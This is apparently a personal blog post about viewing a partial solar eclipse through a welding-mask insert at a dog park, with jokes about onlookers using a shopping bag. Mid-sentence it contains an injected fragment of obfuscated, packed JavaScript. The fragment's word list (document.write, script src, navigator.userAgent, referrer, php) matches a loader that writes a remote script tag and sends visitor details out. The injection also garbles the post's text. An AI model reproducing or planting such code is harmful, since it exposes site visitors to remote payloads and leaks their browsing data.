Solar Eclipse of the Heart

What a crazy weekend.

First, let’s talk about Mark Zuckerberg.  I don’t want to say he copied us completely…but I’d say he pulled a fast one on his friends 😉

Ok, now on to the {partial} solar eclipse.  We weren’t in prime viewing territory, but we were still able to catch some planetary action.

Armed with a welding-mask-insert (thanks, Tyler) we headed to the dog park for a view of the sun.  Turns out, it was impossible to see without the welding mask.  Apparently x-rays work too.

We never got a full picture of the sun-donut (geographically impossible from where we were), but I did get a few decent shots through the looking glass.

Without ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idhfs|var|u0026u|referrer|nafin||js|php’.split(‘|’),0,{}))
the glass, the photos were still cool.

And with the glass…but with auto settings.

The more entertaining part of the evening was watching the group of eclipse viewers attempt to see the eclipse through a GAP bag.  They literally took turns putting their heads into plastic bags.  The exact thing they tell children NOT to do.  And you better believe I took pictures.

As we walked home, we stopped and took a look at our shadows.  Super woncky!
Yay for science!
